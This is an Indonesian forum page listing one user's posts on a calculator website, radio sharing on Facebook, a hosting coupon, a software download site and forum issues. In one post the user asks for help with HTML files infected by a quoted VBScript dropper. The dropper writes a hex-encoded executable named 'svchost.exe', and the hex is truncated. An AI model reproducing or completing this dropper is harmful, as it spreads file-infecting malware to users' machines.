Perlihatkan Tulisan

Seksi ini mengijinkan Anda untuk melihat semua tulisan yang dibuat oleh anggota ini. Catatan bahwa Anda hanya bisa melihat tulisan yang dibuat dalam area di mana Anda memiliki akses terhadapnya.


Topik - Amri MF

Halaman: [1]
1
Website + SEO / Situs Untuk Mengerjakan Soal Hitungan Matematika
« pada: Februari 04, 2015, 05:31:54 PM »
Selamat pagi smadaver, sekedar share dan  minta pendapat dari teman-teman semua.
Awal tahun ini ane mencoba membuat situs untuk mengerjakan soal hitungan terutama matematika, fisikaa dll. Hampir mirip kalkulator, bedanya ini gunanya spesifik pada hitungan tertentu, juga disertai rumus dan  cara mengerjakan soal tersebut.

Contoh, inilah cara menghitung luas lingkaran dengan web ane


Cukup masukkan angka, maka web ane yang akan menghitung untuk kamu, dan websitenya bernama Kalkulasi.com - Kalkulator Online Multi fungsi


Harapan ane, situs ini bisa digunakan untuk mempermudah penghitungan, jadi gak perlu hafal rumus untuk mengerjakan soal matematika, karena masih baru dan masih sedikit fiturnya, ane minta masukkan dari teman2 smadaver.

Tapi biarpun masih baru, sudah ada beberapa fitur yang sudah bisa digunakan seperti:

- Hitung Luas Segitiga
- Hitung Harga Jual Produk Sebelum di Diskon
- Hitung Volume tabung
- Konversi Suhu Fahrenheit ke Kelvin

Silahkan dicoba, dan kasih masukkan buat penambahan fitur

2
Saran untuk Forum / Forum sering error
« pada: Agustus 07, 2012, 05:26:27 PM »
AKihr2 ini kok forum smadav sering error ya

Pesannya seperti ini

8: Undefined offset: -3
File: /home/forumdav/smadaver.com/Sources/Load.php
Line: 1031

Kenapa tuh?

3
Sekedar berbagi gan, siapa tau ada yang pengen dengerin radio saat bermain facebook. Maaf kalo repost atau salah kamar.

Bila nonton video via Facebook tentu bukanlah hal yang aneh dan semua orang pasti sudah tahu, tapi bila mendengarkan radio via Facebook tentu saja merupakan hal yang baru bukan? Ya, benar ternyata kita juga bisa mendengarkan radio melalui Facebook, kedengarannya agak aneh memang, tapi ini bisa kita lakukan, jadi kita bisa share radio favorit kita ke teman teman melalui Facebook dan mendengarkannya bersama sama. Asik bukan..?

Apalagi sekarang hampir semua orang punya account facebook, tentu saja mendengarkan radio via facebook akan menambah mengasikkannya ketika kita bersosial media di Facebook dan caranya pun bisa dikatakan cukup mudah, semudah kita membagikan video Youtube di Facebook

Memang pada umumnya pada situs radio kita dapat mendengarkan radio secara online, namun kita tidak bisa mendengarkannya melalu situs jejaring sosial Facebook, tetapi melalui situs NusaRadio.com kita dapat mendengarkan radio melalui Facebook. Caranya pun tidak perlu aplikasi khusus, cukup kita kunjungi situs NusaRadio.com, lalu kita cari radio favorit kita (terdapat puluhan stasiun radio dari Indonesia maupun manca), lalu kita klik share on Facebook





Setelah itu, silahkan kunjungi Facebook anda, atau facebook teman anda (bila anda share ke semua  teman teman anda), silahkan tinggal klik gambar logo dari radio untuk mendengarkannya.
Share Radio via Facebook


Selamat mendengarkan radio di Facebook anda

Mudah bukan?, kita tidak akan bosan lagi ketika sedang berjejaring sosial Facebook karena bisa sekalian mendengarkan radio.

Sumber: http://aliemw.blogspot.com/2012/03/mendengarkan-radio-via-facebook.html

4
Konsultasi Virus / [ASK] Virus di file HTML
« pada: Maret 17, 2011, 08:49:02 AM »
Selamat pagi smadaver. komputer saya bermasalah neh, setiap saya membuat atau menyimpan file HTML pasti ada kode-kode aneh seperti ini.
Kutip
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000219891FC65F9FFAF65F9FFAF65F9FFAFA3E6A2AF67F9FFAFE246E6AF25F8FFAFDABCA0AF78F9FFAF87B0A0AF64F9FFAFA6F6A0AF47F9FFAF7EB4F0AF69F9FFAFB75BA5AF64F9FFAF5269636865F9FFAF000000000000000000000000000000000000000000000000504500004C01050000BEA23C0000000000000000E0000F010B0107040020000000C001000006000000100200001000000030000000004000001000000002000004000000050001000400000000000000002002000004000042DC0100020000800000400000800000000040000010000000000000100000000000000000000000781500006400000000D00000BC08000000000000000000000000000000000000000000000000000000000000000000000000000000000000870802008500000000000000000000000000000000000000000000000000000000100000E80000000000000000000000000000000000000000000000000000002E7465787400000000200000001000000020000000040000000000000000000000000000200000E02E64617...
Lanjutannya di attachment, coz panjang banget codenya.
Kira2 itu berbahaya gak? trus cara mengatasinya gimana?

5
Buat yang mau hosting murah n handal, barusan ane browsing lalu nemuin kupon kode Hostgator ini. Hostgator mungkin webhosting paling popluler saat ini, tapi ternyata ada kupon kode biar bayarnya murah.
Cukup masukkan coupon code di bawah ini saat membeli paket hosting.
HOSTCENTGATOR
Inilah keuntungannya, bila anda membeli paket baby, anda cukup membayar 1 sen alias $0.01.
Ini fiturnya :
   1. Unlimited Bandwidth
   2. Unlimited Disk Space
   3. Unlimited Domain/Website
   4. Garansi Uptime 99,9%
   5. Bonus $50 Credit Google Adwords ($50 gratis untuk beriklan di google) dan akan bertambah menjadi $100 pada bulan ke-3.
Coupon code ini juga berlaku untuk hosting plan yang lain.
Kalau anda ingin tahu lebih jelas, silahkan langsung ke hostgator.com, masukkan kode HOSTCENTGATOR pada waktu order.
Lumayan kan, semoga informasi ini berguna.  :)
Sumber

6
Software / Berbagi Software Gratis Yuk
« pada: Juli 17, 2010, 10:10:38 PM »
Setelah beberapa kali membaca thread di Forum Software Lokal, ternyata banyak juga software karya anak bangsa di forum ini.
Berhubung satu bulan yang lalu saya membuat situs download gratis seperti di signature saya (http://www.softaza.com), maka tak ada salahnya bila software lokal yang ada di sini saya masukkan juga.
Mungkin akan lebih baik bila si empunya sopwer yang mensubmit, coz saya gak tau kapan update softwarenya.

Cara submit softwarenya ad 2 cara, pake Form atau submit PAD (Portable Application Document - file xml)
Kalau yang pake PAD bisa langsung submit tanpa harus login, tapi kalo lewat form submit software harus daftar dulu  di sini

Contoh cara submit PAD
Klik menu Submit Pad
masukkan URL PAD nya
Contoh
Kode: [Pilih]
http://www.barcodelabelcreator.org/blcorg-barcode.xml 

Klik submit PAD
Otomatis software langsung masuk di halaman depan menjadi http://softaza.com/free-download-create-barcode-labels-5-0-1-5/

Kalo yang pake Form gampang kok, tinggal isi data-datanya.

Please jangan mensubmit software ilegal (No crack, no keygen, warez etc)
Kalo belum tau PAD, silahkan meluncur ke sini http://pad.asp-software.org/

Sekian dulu, mo aransemen musik n kampanye open source dulu hehe...

7
Saran untuk Forum / Masalah Reply thread
« pada: Juni 06, 2010, 04:37:49 PM »
Salam para admin smadaver, cuma ngasih saran neh.
Gimana kalau dibawah trit/thread/topic, ada form Quick reply seperti forum2 yang pake Vbuletin.
Setelah reply juga agak membingungkan, soalnya kembali ke subforum (bukan ke trit yang dibales)
Aku belum pernah pake SMF, tapi seandainya dibuat seperti itu bisa kan?

Halaman: [1]